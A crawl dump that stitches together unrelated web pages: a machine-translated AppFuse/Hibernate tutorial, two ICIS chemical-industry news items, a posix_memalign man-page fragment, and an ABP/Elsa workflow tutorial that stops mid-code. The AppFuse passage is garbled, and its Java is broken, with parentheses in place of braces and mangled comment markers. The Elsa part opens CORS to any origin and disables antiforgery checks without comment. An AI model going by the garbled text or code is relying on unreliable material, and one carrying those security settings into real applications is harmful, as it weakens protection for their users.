J2SE 1.4 +, set the JAVA_HOME environment variable correctly, install Ant 1.6.2 +, set the ANT_HOME environment variable. 3, the installation of MySQL 3.23.x + (recommended version 4.1.7) and Tomcat 4.1.x + (recommended version 5.0.28), set the CATALINA_HOME environment variable to point to your Tomcat installation directory. Note: If you are ready to use MySQL 4.1.7, then you must be the default character set is set to UTF-8 character set and its default table type to InnoDB type. In other words, you want in your c: \ Windows \ my.ini or / etc / my.cnf file add the following lines: [mysqld] default-character-set = utf8 [mysqld] default-table-type = innodb 4, install a local SMTP server, or if you already have an available SMTP server, you can modify the mail.properties (in web / WEB-INF / classes directory) and build.properties (in the root directory -- - information for log4j) to point to your SMTP server - by default it is the point to your local SMTP server. 5, lib/junit3.8.1/junit.jar documents will be copied to the $ ANT_HOME / lib directory. 6, the implementation of ant new-Dapp.name = YOURAPPNAME-Ddb.name = YOURDBNAME command. This will create a file called "YOURAPPNAME" directory. Warning: the order for some values will not implement the app.name - Do not use "test", containing "appfuse" in the name of one of you, or any figure, two book No. (-) and so on mixed up the names of . 7, to the new directory, the implementation of ant's mission to create a database setup, at the same time your application will be posted to the Tomcat server. Only when the root of your password database user does not have the mission will work. You can also open in the time required to change the build.properties file root user's password. If you want to test and would like to know whether all were able to work well, then you can run ant the test-all mission to conduct a comprehensive test - of course the premise that when you first make the time to test Tomcat server to stop. 
8, implementation of test-reports of ant mission - when the mission after the implementation, there will be a message to tell you how to view those generated test reports. When you sure you step through the above-configured your development environment after the AppFuse - below you need to do is study guide to learn about how to use AppFuse for your development. Optional installation If you are willing to choose to use iBATIS as the persistence layer framework for you, please take a look specifically extras / ibatis directory README.txt file. If you are willing to choose to use Spring as your WEB layer framework, please take a look specifically extras / spring directory README.txt file. If you are willing to choose to use WebWork as your WEB layer framework, please take a look specifically extras / webwork directory README.txt file. Choose if you are willing to Tapestry as your web tier framework, please take a look specifically extras / tapestry directory README.txt file. If you are willing to select JSF as your web tier framework, please take a look specifically extras / jsf directory README.txt file. If you want you can through the script to automatically complete the creation and testing, you can refer to the following script: rm-r .. / appfuse-spring ant new-Dapp.name = appfuse-spring-Ddb.name = ibatis cd .. / appfuse-spring ant install-ibatis install-springmvc cd extras / ibatis ant uninstall-hibernate cd ../.. ant setup ant test-all test-reports If you do not want to install iBATIS, Spring MVC or WebWork, you will be in your items before the warehouse code control, you should remove them in extras directory of the installation content. -------------------------------------------------- ------------------------------ Typically, when you have completed all of the above steps and they can work, the most likely thing you would want to put "org.appfuse" package names changed to a similar "com.company" this kind of package names. Does this matter now has been very easy, all you need to do is to download a package of tools, take a look at its README file, in order to understand its installation and use. Note: before you use this tool it is best to do your project will be a backup to ensure it is able to resume. If you will read org.appfuse.webapp.form packages such as test.web.form such a package name, you have to go simultaneously tinkering src / service package ConverterUtil category, getOpposingObject Ways are your friends, let us look at click: name = StringUtils.replace (name, "model", "webapp.form"); name = StringUtils.replace (name, "webapp.form", "model"); Three, AppFuse Development Guide If you have already downloaded and AppFuse want in your machine to install it, you'd better get started quickly in accordance with the steps to install. Once you have installed all of the content, the following guidelines are studying how to use AppFuse you develop the best tutorials. NOTE: AppFuse guide the development of the release contains a version of same, if you want to update your copy that works (which in the docs directory), can be through the implementation of "ant wiki" to complete. For AppFuse 1.6.1, you can tell in this Guide Ways to generate most of your code. If you're using Struts + Hibernate such a combination, you can even generate them completely. And if you select the web tier framework of the Spring or WebWork is not so fortunate for them to write an automated installation scripts exist many difficulties, so you have to configure it yourself Controllers and Actions of those. 
This is mainly because I do not have the framework of these web layer using XDoclet, but also because of the use of Ant tools as the limitations caused by the installation tool. A tool for automatic generation of code called me AppGen, I explain in Part I of how to use it. Part I: in AppFuse to create new DAOs and Objects - This is a about how to create a table based on data for the Java object and thus how to create Java persistent object category to the database in the tutorial. 1, with regard to this guide: This guide will show you how to create a new database table, and how to access the table to create Java code. We will create an object and some other categories to this object will be persistent (save, load, delete) to a database. Using Java language, we call this object is a POJO object (Plain Old Java Object), this object is basically a database tables are corresponding to the other categories will be: A data access object (also known as a DAO), an interface, implementation of a Hibernate type. A JUnit class to test whether the U.S. DAO job correctly. Note: If you are using MySQL and if you want to use the Service (Generally you will certainly choose to use), then you must be table-type set to InnoDB. You can do so, add the following contents of your mysql configuration file (/ etc / my.cnf or c: \ Windows \ my.ini) Medium. The second set (used to set UTF-8 character set) mysql 4.1.7 + are required. [mysqld] default-table-type = innodb default-character-set = utf8 If you use PostgreSQL Batch confusion encountered an error, you can try in your src / dao / ** / hibernate / applicationContext-hibernate.xml add 0 configuration file to turn off the batch. AppFuse using Hibernate as its default persistence layer. Hibernate is an object-relational mapping framework, which allows you to your Java objects and database tables to establish a mapping. So you can easily implement your object CRUD (Create, Retrieve, Update, Delete) operations. You can use the same iBATIS persistence layer as another possible choice. If you want to AppFuse install iBATIS, look extras / ibatis directory README.txt file. If you want to use iBATIS to replace Hibernate, I hope you are have enough reason and you should be familiar with it. I also hope that you can on how to use iBATIS in AppFuse-based guide to make good recommendations. ;-) I will use the following language to tell you the actual development process is how I do. Let us start at AppFuse project structure to create a new object, a DAO and a test case to start. Table of Contents [1] to create a new Object and add XDoclet tags [2] the use of Ant, based on our new object to create a new database table [3] to create a new order for DAOTest to JUnit test DAO [4] to create a new DAO object for the implementation of our CRUD operations [5] for the Person object and configure the Spring configuration file PersonDAO [6] to run test DAOTest [1] to create a new Object and add XDoclet tags We need to do first thing is to create an object go of it lasting. Let us create a simple "Person" objects (to create the src / dao / ** / model directory), we let it have an id, a firstName and a lastName (as the object of property). 
package org.appfuse.model; public class Person extends BaseObject ( private Long id; private String firstName; private String lastName; / * Generate your getters and setters using your favorite IDE: In Eclipse: Right-click -> Source -> Generate Getters and Setters * / ) This class should be inherited from BaseObject, because BaseObject has three abstract methods: (equals (), hashCode () and toString ()), so you have to type in the Person of their implementation. The first two methods are required by Hibernate, the simplest way is to use tools (such as: Commonclipse) to complete it, if you want to know about using this tool more information you can go to find the website of Lee Grey. Another tool you can use are Commons4E, it is an Eclipse Plugin, I have not used, so I can not tell you what features it has. If you are using IntelliJ IDEA, you can generate equals () and hashCode (), but can not generate toString (), of course, have a ToStringPlugin, but I have never personally used. Now we have a good create a POJO, we need to add XDoclet tags inside it in order to generate Hibernate mapping file. This mapping file is to allow Hibernate to map objects to tables, maps to the property listed in the table. First, we add a @ hibernate.class tags, the tags tell Hibernate mapping which this object will be a table: / ** * @ Hibernate.class table = "person" * / public class Person extends BaseObject ( We must also add a primary key mapping, otherwise, when the generated mapping file when an error will occur XDoclet. Attention to all of these @ hibernate .* tags should be placed in your POJO object getter methods Javadocs location. / ** * @ Return Returns the id. * @ Hibernate.id column = "id" * Generator-class = "increment" unsaved-value = "null" * / public Long getId () ( return this.id; ) I use a generator-class = "increment" in lieu of generate-class = "native", because I found that when the database in some other use "native" when there are some problems. If you only intend to use MySQL, I recommend you use "native", and our guide to the use of the "increment". [2] the use of Ant, based on our new object to create a new database table You can by running "ant setup-db" to create the person table. On the one hand, this task will be to create Person.hbm.xml create documents, on the other hand, can be in the database to create a "person" table. From the ant console, you can see Hibernate to create the table for your model: [schemaexport] create table person ( [schemaexport] id bigint not null, [schemaexport] primary key (id) [schemaexport]); If you want to see what Hibernate generated Person.hbm.xml for your document, you can go build / dao / gen / ** / model directory of view, I have listed the contents of the following: "- / / Hibernate / Hibernate Mapping DTD 2.0 / / EN" ""> Original connection: Related Posts of What is the appfuse ... Spring jar package Detailed AspectJ directory are in the Spring framework to use AspectJ source code and test program files. AspectJ is the first java application framework provided by the AOP. dist directory is a Spring release package, regarding release package described below in ...
http://www.codeweblog.com/what-is-the-appfuse/
CC-MAIN-2013-48
en
refinedweb
02 April 2007 17:14 [Source: ICIS news] NEW DELHI (ICIS news)--India's Navin Fluorine International Limited has secured approval to generate tradeable carbon credits by reducing emissions of greenhouse gases (GHGs) equivalent to 2.8 million tonnes/year of carbon dioxide. The company said on Monday that the clean development mechanism (CDM) executive board of the UN Framework Convention on Climate Change (UNFCCC) had registered its CDM project. Navin Fluorine earlier obtained approvals from the Indian Government and an independent international project validation entity. The company initiated the CDM project last year by deploying the GHG emission reduction technology of the UK's Ineos Fluor. When completed in mid-2007, the project would prevent emission of hydrofluorocarbon-23 (HFC23), a by-product generated during the manufacture of refrigerant HFC22 at its Bhestan plant. Formerly Polyolefins Rubber Chemicals Limited, Navin Fluorine manufactures bulk chemicals such as anhydrous hydrofluoric acid and aluminium fluoride, and specialty chemicals such as phenyl trimethyl ammonium chloride and n-methyl n-benzyl aniline, at Bhestan and at Dewas in Madhya Pradesh.
http://www.icis.com/Articles/2007/04/02/9017990/indias-navin-flourine-prepares-for-carbon-trading.html
CC-MAIN-2013-48
en
refinedweb
11 December 2009 17:49 [Source: ICIS news] WASHINGTON (ICIS news)--US retail and food services sales rose by 1.3% in November, the Commerce Department said on Friday, raising hopes that consumers are gaining confidence in the recovery and are willing to spend. Consumer spending is the principal driving force of the US economy. The improvement in retail sales last month was almost twice what market analysts had been expecting. The department said that retail and food services sales were at a seasonally adjusted $352.1bn (€239.4bn) in November, an increase of 1.3% from October and nearly 2% above the retail sales level of November last year. Much of the gain in November's retail sales was attributed to a 6% rise in gasoline sales at the pump, but as fuel prices were more or less steady in November, the sales increase suggests that consumers were more willing to travel and shop. Increased consumer spending also appeared to be reflected in a 2.8% gain in retail sales at electronics and appliances stores and a 1.5% improvement in sales of building materials and garden supplies at the retail level. Along with modest gains in retail sales at sporting goods, book and music stores and improvements in beverages and restaurant dining, the data suggest that US consumers are increasingly willing to spend on more recreational and leisure items, not just on essentials such as food, clothing and shelter. Much of the chemicals industry ultimately depends on consumer purchasing, which drives sales of such downstream chemicals-consuming products as autos, appliances, electronics, CDs and other storage media and retail product packaging.
http://www.icis.com/Articles/2009/12/11/9318753/us-retail-sales-rise-1.3-in-nov-signal-recovery-gains.html
CC-MAIN-2013-48
en
refinedweb
#include <stdlib.h>

int posix_memalign(void **memptr, size_t alignment, size_t size);

..., the Base Definitions volume of IEEE Std 1003.1-2001, <stdlib.h>
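A minimal usage sketch for the prototype above (the 64-byte alignment and 1024-byte size are arbitrary example values; the alignment must be a power of two that is a multiple of sizeof(void *)):

#define _POSIX_C_SOURCE 200112L  /* expose posix_memalign in strict compilation modes */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *buf = NULL;
    /* Ask for 1024 bytes aligned on a 64-byte boundary. */
    int err = posix_memalign(&buf, 64, 1024);
    if (err != 0) {
        /* posix_memalign returns an error number instead of setting errno. */
        fprintf(stderr, "posix_memalign failed: %d\n", err);
        return 1;
    }
    printf("allocated at %p\n", buf);
    /* Memory obtained from posix_memalign is released with free(). */
    free(buf);
    return 0;
}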
http://www.makelinux.net/man/3posix/P/posix_memalign
CC-MAIN-2013-48
en
refinedweb
. 1. What Is App Engine? App Engine is a cloud platform where you quickly can deploy your application without worrying too much about the infrastructure. Besides that, your application can automatically scale up and down, you can debug and monitor your application, split traffic, etc. Two types of App Engine environments exist: the standard environment and the flexible environment. Which environment to choose, depends on your application’s needs. A complete comparison of features between the two environments can be found here. You choose for the standard environment when: - you don’t mind that your application is running in a sandbox which is limited to a specific set of languages and runtime versions; - your application needs rapid scaling; - you only want to pay when your application is being used; - Pricing is based on instance hours. You choose for the flexible environment when: - you want your application to run inside Docker containers on Compute Engine virtual machines; - your application receives a constant flow of traffic and gradually needs scaling up and down; - you need to use a programming language or runtime version which is not supported by the standard environment; - you need to access resources or services of your GCP project; - you pay based on the usage of vCPU, memory and persistent disks.. 2. Deploy to Flexible Environment We will start with deployment to the flexible environment. The reason for this will become clear when we try to deploy to the standard environment. Sources being used can be found at GitHub. 2.1 Create the Application First, we need to create a Spring Boot application. We create this at start.spring.io and choose Java 1.8 and Web MVC. We choose Java 1.8 because this is the supported Java version for the standard environment and our aim is to use this same application for deployment to the standard environment without any changes. We add a HelloController which prints a Hello Google App Engine welcome message and the host where our application is running: @RestController public class HelloController { @RequestMapping("/hello") public String hello() { StringBuilder message = new StringBuilder("Hello Google App Engine!"); try { InetAddress ip = InetAddress.getLocalHost(); message.append(" From host: " + ip); } catch (UnknownHostException e) { e.printStackTrace(); } return message.toString(); } } In order to make the deployment to App Engine easier, we add the App Engine Maven Plugin to our pom: <build> <plugins> ... <plugin> <groupId>com.google.cloud.tools</groupId> <artifactId>appengine-maven-plugin</artifactId> <version>1.3.2</version> <configuration> <version>1</version> </configuration> </plugin> </plugins> </build> We also need an app.yaml file which is needed to configure your App Engine application’s settings. A complete reference for the app.yaml file can be found here. We add the following app.yaml file to directory src/main/appengine/ : runtime: java env: flex handlers: - url: /.* script: this field is required, but ignored 2.2 Create the GCP Project Now that we have created our application, it is time to turn to the Google Cloud Platform. Create a MyGoogleAppEnginePlanet project in GCP. This also shows us the project ID, which we must remember somewhere. 
Start the Google Cloud Shell in the browser and clone the git repository: $ git clone Enter the mygoogleappengineplanet directory and run the application: $ mvn clean spring-boot:run Our application now runs in the console and we can use web preview in order to access our hello URL: In the browser a new tab is opened to the following URL: This will show a 404 error page, because it maps to the root URL. Let’s change it to our hello URL: This will show us our welcome message, as expected: Hello Google App Engine! From host: cs-6000-devshell-vm-859e05a5-a8a3-4cd2-813f-af385740076b/172.17.0.3 2.3 Deploy to App Engine When creating an application in AppEngine, we need to choose a region where the application will be running. The list of regions can be shown by issuing the command: $ gcloud app regions list We will choose region europe-west and create our AppEngine app: $ gcloud app create --region europe-west You are creating an app for project [gentle-respect-234016]. WARNING: Creating an App Engine application for a project is irreversible and the region cannot be changed. More information about regions is at <>. Creating App Engine application in project [gentle-respect-234016] and region [europe-west]....done. Success! The app is now created. Please use `gcloud app deploy` to deploy your first app. From within our git repository directory, we can deploy our application: $ mvn -DskipTests appengine:deploy After deployment, open the browser and enter the welcome URL: This will show us the hello message again. In order to prevent extra charges against your GCP credit, you should shutdown your GCP project. 3. Deploy to Standard Environment. This causes several conflicts because Spring Boot uses an embedded Tomcat Web Server. More information about the configuration of a Spring Boot application for the standard environment can be found here. The sources for the standard environment are available in the feature/standardenv branch of our git repository. 3.1 Convert for Standard AppEngine In this section we will convert our previously created application with configuration for the flexible environment to a configuration which will be deployable to the standard environment. We need to remove the app.yaml file and we add an appengine-web.xml in directory src/main/webapp/WEB-INF with the following contents: <appengine-web-app <threadsafe>true</threadsafe> <runtime>java8</runtime> <system-properties> <property name="java.util.logging.config.file" value="WEB-INF/classes/logging.properties"/> </system-properties> </appengine-web-app> We add a SpringBootServletInitializer implementation: public class ServletInitializer extends SpringBootServletInitializer { @Override protected SpringApplicationBuilder configure(SpringApplicationBuilder application) { return application.sources(MyGoogleAppEnginePlanetApplication.class); } } The following changes are made to our pom: ... <packaging>war</packaging> ... <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-tomcat</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>javax.servlet</groupId> <artifactId>javax.servlet-api</artifactId> <scope>provided</scope> </dependency> <!-- Exclude any jul-to-slf4j --> <dependency> <groupId>org.slf4j</groupId> <artifactId>jul-to-slf4j</artifactId> <scope>provided</scope> </dependency> .. 
And finally, we add a logging.properties file into src/main/resources: .level = INFO 3.2 Run and Deploy In order to run the application, we need to issue the following command: $ mvn appengine:run In the logs we can clearly see that the standard environment is used: [INFO] Detected App Engine standard environment application. The URL is again accessible via the web preview, just as we did before at the flexible environment. Deployment to AppEngine is identical as for the flexible environment: $ mvn -DskipTests appengine:deploy Check the correct deployment by accessing the URL via web preview and the following response is issued: Hello Google App Engine! From host: localhost/127.0.0.1 4. Conclusion In this post we looked at GCP App Engine and how we can deploy a Spring Boot application to the standard and flexible environment. We would not advise to deploy a Spring Boot application to the standard environment because you need to convert it in order to make it run into a Jetty Web Server. You will lose some benefits of Spring Boot. This does not mean that you should never use the standard environment. Spring Boot is probably not the best technical choice for the standard environment. The flexible environment in combination with Spring Boot is easy to use. Besides that, you have the choice of choosing another runtime than Java 8 and you can keep the benefits of using a Spring Boot application. Reblogged this on HelpEzee and commented: Nice post surely will be helpful
https://mydeveloperplanet.com/2019/04/10/deploy-spring-boot-app-to-gcp-app-engine/
CC-MAIN-2022-05
en
refinedweb
In this post, we will explore the Jira Rest API. We will explain how you can use the Jira API in order to generate a user based time report. Besides that, it is a good excuse to do some Python coding. 1. Introduction A lot of companies are using Jira nowadays in order to support their Scrum or Kanban process. Add-ons can be installed for extending the functionality of Jira. Some of them are free, other ones need to be purchased. Jira is available in two versions, a Cloud version and a Server (on-premise) version. The number of add-ons for Jira Cloud is very limited and aims at smaller teams, Jira Server has many more add-ons and aims at larger organizations . The number of add-ons and whether you want to be responsible for maintenance yourself, can be decisive factors which version to use. However, both versions also support an API. It is a quite extended API and gives you the opportunity to write your own scripts extending the Jira functionality. E.g. you can create an interface between your Service Management system and Jira for passing tickets from 1st line support (working with the Service Management system) to 2nd line support (working with Jira). Enough for this introduction, let’s start using the API! We will develop a Python script which will generate a user based time report for a specific Jira project. We are using Python 3.7.5 and version 2 of the Jira API. The sources can be found at GitHub. 2. Create a Jira Cloud Account First things first, we will need a running instance of Jira in order to execute some integration tests. Go to the Jira website and navigate to the bottom of the page. We choose the free Jira Cloud plan. In the next step, you need to create an account and choose a site name. We choose the mydeveloperplanet.atlassian.net site name. Last thing to do, is to create a Scrum board and we are all set to go. It took us less than 5 minutes to get started with Jira Cloud, pretty cool, isn’t it? Create some user stories with sub-tasks, start a sprint and log some work to the sub-tasks. We can also use the Jira API to do so, but that is maybe something for another post. 3. The Jira API Since we are using Jira Cloud, we need to create an API token first. Click on your avatar in the left bottom corner and choose ‘Account settings’ . Go to the Security tab and create the API token. Now, let’s take a look at the Jira Rest API documentation: The API is well documented and contains examples how to call the API with curl, Node.js, Java, Python and PHP. The expected response of the request is also provided. So, all of the documentation is available, the main challenge is to find out which requests you need for your application. Beware that there is also documentation available for the Jira Server API. It contains less clear information than the Cloud version. Before writing a script which should support both versions, check whether the API call is identical and use the Cloud documentation if possible. Note that it is also possible to use the Python Jira library, but we preferred to talk to the Jira API directly. This way, we are independent of a third party library. 4. The Jira Time Report The requirements for the Jira time report we want to create, are the following: - The report must contain all the logged worked per user within a specified time period for a specific Jira project; - The report must be sorted by user, day and issue. For retrieving the work logs of a Jira issue, we need to call the Get issue worklogs request. This request requires an issue Id or key. 
Therefore, we first need to retrieve the issues which contain work logs within the specified time period. We can use the Search for issues using JQL request for that. This gives us the possibility to use the Jira Query Language (JQL), just like we can use it for searching issues in Jira itself. We are using the following query:

query = {
    'jql': 'project = "' + args.project + '" and timeSpent is not null and worklogDate >= "' +
           args.from_date + '"' + ' and worklogDate < "' +
           convert_to_date(args).strftime("%Y-%m-%d") + '"',
    'fields': 'id,key',
    'startAt': str(start_at)
}

The jql checks the Jira project, whether there is any time spent on the issue and, at the end, whether work logs exist within the specified time period. The Jira project and the date to search from are given as arguments when starting the application. The from_date will have a time of 00:00:00. The convert_to_date function adds one day to the to_date argument at time 00:00:00. When no to_date is given, it defaults to tomorrow at time 00:00:00. The fields indicate which fields we want to receive. If not provided, all fields are returned, but we are only interested in the id and the key. The start_at parameter indicates from which record on we want to receive the results. The results are paginated (max 50 results currently), so we will need to do something in order to request the other pages.

We invoke the Jira request with the above query and load the JSON part into response_json. Remember that pagination is used, so we add the plain JSON issue results to the list which will hold all issues in line 3. We deliberately did not transform the JSON output into objects because we only need the id and key. We can always do so later on if we want to.

response = get_request(args, "/rest/api/2/search", query)
response_json = json.loads(response.text)
issues_json.extend(response_json['issues'])

Support for pagination is done in the next part. The JSON response holds the total number of issues which are returned from the query and the maximum number of results which are returned per request. We read those fields from the response and then check whether the request must be invoked again with a new start_at parameter. This code and the code above are part of an endless while-loop. We break out of the loop when we have processed all of the search results in line 7.

total_number_of_issues = int(response_json['total'])
max_results = int(response_json['maxResults'])
max_number_of_issues_processed = start_at + max_results
if max_number_of_issues_processed < total_number_of_issues:
    start_at = max_number_of_issues_processed
else:
    break

Retrieving the work logs works pretty much the same way. We retrieve the work logs of an issue and then process only the work logs which fall within the given time period. The work logs are converted to WorkLog objects.

class WorkLog:
    def __init__(self, issue_key, started, time_spent, author):
        self.issue_key = issue_key
        self.started = started
        self.time_spent = time_spent
        self.author = author

The only thing left to do is to sort the list of work logs. We use sorted for this and by means of attrgetter we get the desired sorting.

sorted_on_issue = sorted(work_logs, key=attrgetter('author', 'started', 'issue_key'))

Last but not least, the sorted_on_issue list is used to format the work logs into the chosen output format: either console output, a CSV file or an Excel file. For the latter, we used the xlsxwriter Python library.
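As a sketch of the CSV flavour (the CSV_FILE_NAME constant is made up for illustration, and timedelta comes from Python's datetime module), before looking at the xlsxwriter version right after it:

import csv
from datetime import timedelta

def output_to_csv(work_logs):
    # Hypothetical CSV counterpart of the Excel output shown below:
    # one row per work log, in the order author, day, issue, time spent
    with open(CSV_FILE_NAME, 'w', newline='') as csv_file:
        writer = csv.writer(csv_file)
        for work_log in work_logs:
            writer.writerow([work_log.author,
                             work_log.started.strftime('%Y-%m-%d'),
                             work_log.issue_key,
                             str(timedelta(seconds=work_log.time_spent))])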
def output_to_excel(work_logs):
    workbook = xlsxwriter.Workbook(EXCEL_FILE_NAME)
    try:
        worksheet = workbook.add_worksheet()
        row = 0
        for work_log in work_logs:
            worksheet.write(row, 0, work_log.author)
            worksheet.write(row, 1, work_log.started.strftime('%Y-%m-%d'))
            worksheet.write(row, 2, work_log.issue_key)
            worksheet.write(row, 3, str(timedelta(seconds=work_log.time_spent)))
            row += 1
    finally:
        workbook.close()

5. Conclusion

We explored the Jira API in order to generate a time report per user in a given time period for a specific Jira project. The API is well documented and quite easy to use. When searching for information about the Jira REST API, you will be guided to version 3 of the API. Beware that this version is currently in beta. Feel free to use the Jira time report generator and to request any new features.
https://mydeveloperplanet.com/2020/02/12/how-to-use-the-jira-api/
CC-MAIN-2022-05
en
refinedweb
Using Elsa Workflow with ABP Framework Elsa Core is an open-source workflows library that can be used in any kind of .NET Core application. Using such a workflow library can be useful to implement business rules visually or programmatically. This article shows how we can use this workflow library within our ABP-based application. We will start with a couple of examples and then we will integrate the Elsa Dashboard (you can see it in the above gif) into our application to be able to design our workflows visually. Source Code You can find the source of the example solution used in this article here. Create the Project In this article, I will create a new startup template with EF Core as a database provider and MVC/Razor-Pages for the UI framework. If you already have a project with MVC/Razor-Pages or Blazor UI, you don't need to create a new startup template, you can directly implement the following steps to your existing project (you can skip this section). - We will create a new solution named ElsaDemo(or whatever you want). We will create a new startup template with EF Core as a database provider and MVC/Razor-Pages for the UI framework by using the ABP CLI: abp new ElsaDemo Our project boilerplate will be ready after the download is finished. Then, we can open the solution in the Visual Studio (or any other IDE). We can run the ElsaDemo.DbMigratorproject to apply migration into our database and seed initial data. After the database and initial data created, we can run the ElsaDemo.Webto see our UI working properly. Default admin username is admin and password is 1q2w3E* Let's Create The First Workflow (Console Activity) We can start with creating our first workflow. Let's get started with creating a basic hello-world workflow by using console activity. In this example, we will programmatically define a workflow definition that displays the text "Hello World from Elsa!" to the console using Elsa's Workflow Builder API and run this workflow when the application initialized. Install Packages We need to add two packages: Elsa and Elsa.Activities.Console into our ElsaDemo.Web project. We can add these two packages with the following command: dotnet add package Elsa dotnet add package Elsa.Activities.Console - After the packages installed, we can define our first workflow. To do this, create a folder named Workflows and in this folder create a class named HelloWorldConsole. using Elsa.Activities.Console; using Elsa.Builders; namespace ElsaDemo.Web.Workflows { public class HelloWorldConsole : IWorkflow { public void Build(IWorkflowBuilder builder) => builder.WriteLine("Hello World from Elsa!"); } } In here we've basically implemented the IWorkflowinterface which only has one method named Build. In this method, we can define our workflow's execution steps (activities). As you can see in the example above, we've used an activity named WriteLine, which writes a line of text to the console. Elsa Core has many pre-defined activities like that. E.g HttpEndpoint and WriteHttpResponse (we will see them both in the next section). "An activity is an atomic building block that represents a single executable step on the workflow." - Elsa Core Activity Definition - After defining our workflow, we need to define service registrations which required for the Elsa Core library to work properly. To do that, open your ElsaDemoWebModuleclass and update your ElsaDemoWebModulewith the following lines. Most of the codes are abbreviated for simplicity. 
using ElsaDemo.Web.Workflows; using Elsa.Services; public override void ConfigureServices(ServiceConfigurationContext context) { var hostingEnvironment = context.Services.GetHostingEnvironment(); var configuration = context.Services.GetConfiguration(); //... ConfigureElsa(context); } private void ConfigureElsa(ServiceConfigurationContext context) { context.Services.AddElsa(options => { options .AddConsoleActivities() .AddWorkflow<HelloWorldConsole>(); }); } public override void OnApplicationInitialization(ApplicationInitializationContext context) { //... var workflowRunner = context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } Here we basically, configured Elsa's services in our ConfigureServicesmethod and after that in our OnApplicationInitializationmethod we started the HelloWorldConsoleworkflow. If we run the application and examine the console outputs, we should see the message that we defined in our workflow. Creating A Workflow By Using Http Activities In this example, we will create a workflow that uses Http Activities. It will basically listen the specified route for incoming HTTP Request and writes back a simple response. Add Elsa.Activities.Http Package - To be able to use HTTP Activities we need to add Elsa(we've already added in the previous section) and Elsa.Activities.Httppackages into our web application. dotnet add package Elsa.Activities.Http - After the package installed, we can create our workflow. Let's started with creating a class named HelloWorldHttpunder Workflows folder. using System.Net; using Elsa.Activities.Http; using Elsa.Builders; namespace ElsaDemo.Web.Workflows { public class HelloWorldHttp : IWorkflow { public void Build(IWorkflowBuilder builder) { builder .HttpEndpoint("/hello-world") .WriteHttpResponse(HttpStatusCode.OK, "<h1>Hello World!</h1>", "text/html"); } } } The above workflow has two activities. The first activity HttpEndpointrepresents an HTTP endpoint, which can be invoked using an HTTP client, including a web browser. The first activity is connected to the second activity WriteHttpResponse, which returns a simple response to us. After defined the HelloWorldHttp workflow we need to define this class as workflow. So, open your ElsaDemoWebModuleand update the ConfigureElsamethod as below. private void ConfigureElsa(ServiceConfigurationContext context) { context.Services.AddElsa(options => { options .AddConsoleActivities() .AddHttpActivities() //add this line to be able to use the http activities .AddWorkflow<HelloWorldConsole>() .AddWorkflow<HelloWorldHttp>(); //workflow that we defined }); } - And add the UseHttpActivities middleware to OnApplicationInitilizationmethod of your ElsaDemoWebModuleclass. public override void OnApplicationInitialization(ApplicationInitializationContext context) { // ... app.UseAuditing(); app.UseAbpSerilogEnrichers(); app.UseHttpActivities(); //add this line app.UseConfiguredEndpoints(); var workflowRunner = context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } - If we run the application and navigate to the "/hello-world" route we should see the response message that we've defined (by using WriteHttpResponse activity) in our HelloWorldHttpworkflow. Integrate Elsa Dashboard To Application Until now we've created two workflows programmatically. But also we can create workflows visually by using Elsa's HTML5 Workflow Designer. 
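Before moving on to the dashboard, one more programmatic example shows how the console and HTTP activities from the previous sections can be combined in a single workflow. This is only a sketch: the route, message and class name are invented, and it assumes the WriteLine and HTTP activity extension methods chain together in the same way as in the two workflows above.

using System.Net;
using Elsa.Activities.Console;
using Elsa.Activities.Http;
using Elsa.Builders;

namespace ElsaDemo.Web.Workflows
{
    public class HelloWorldLogged : IWorkflow
    {
        public void Build(IWorkflowBuilder builder)
        {
            builder
                .HttpEndpoint("/hello-logged")                                  // wait for an incoming request
                .WriteLine("Received a request on /hello-logged")               // log to the console
                .WriteHttpResponse(HttpStatusCode.OK, "<h1>Hello (logged)!</h1>", "text/html"); // answer it
        }
    }
}

A workflow defined this way still has to be registered, either with .AddWorkflow<HelloWorldLogged>() or by being picked up automatically once .AddWorkflowsFrom<Startup>() is used later on.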
Being able to design our workflows easily and taking advantage of HTML5 Workflow Designer we will integrate the Elsa Dashboard to our application. Install Packages - Following three packages required for Elsa Server. dotnet add package Elsa.Activities.Temporal.Quartz dotnet add package Elsa.Persistence.EntityFramework.SqlServer dotnet add package Elsa.Server.Api Also, we need to install the Elsa and Elsa.Activities.Http packages but we've already installed these packages in the previous sections. - We need to install one more package named Elsa.Designer.Components.Web. This package provides us the Elsa Dashboard component. dotnet add package Elsa.Designer.Components.Web - After the package installations completed, we need to make the necessary configurations to be able to use the Elsa Server and Elsa Dashboard. Therefore, open your ElsaDemoWebModuleclass and make the necessary changes as below. public override void ConfigureServices(ServiceConfigurationContext context) { var configuration = context.Services.GetConfiguration(); //... ConfigureElsa(context, configuration); } private void ConfigureElsa(ServiceConfigurationContext context, IConfiguration configuration) { var elsaSection = configuration.GetSection("Elsa"); context.Services.AddElsa(elsa => { elsa .UseEntityFrameworkPersistence(ef => DbContextOptionsBuilderExtensions.UseSqlServer(ef, configuration.GetConnectionString("Default"))) .AddConsoleActivities() .AddHttpActivities(elsaSection.GetSection("Server").Bind) .AddQuartzTemporalActivities() .AddJavaScriptActivities() .AddWorkflowsFrom<Startup>(); }); context.Services.AddElsaApiEndpoints(); context.Services.Configure<ApiVersioningOptions>(options => { options.UseApiBehavior = false; }); context.Services.AddCors(cors => cors.AddDefaultPolicy(policy => policy .AllowAnyHeader() .AllowAnyMethod() .AllowAnyOrigin() .WithExposedHeaders("Content-Disposition")) ); //Uncomment the below line if your abp version is lower than v4.4 to register controllers of Elsa . //See (we will no longer need to specify this line of code from v4.4) // context.Services.AddAssemblyOf<Elsa.Server.Api.Endpoints.WorkflowRegistry.Get>(); //Disable antiforgery validation for elsa Configure<AbpAntiForgeryOptions>(options => { options.AutoValidateFilter = type => type.Assembly != typeof(Elsa.Server.Api.Endpoints.WorkflowRegistry.Get).Assembly; }); } public override void OnApplicationInitialization(ApplicationInitializationContext context) { app.UseCors(); //... app.UseHttpActivities(); app.UseConfiguredEndpoints(endpoints => { endpoints.MapFallbackToPage("/_Host"); }); var workflowRunner = 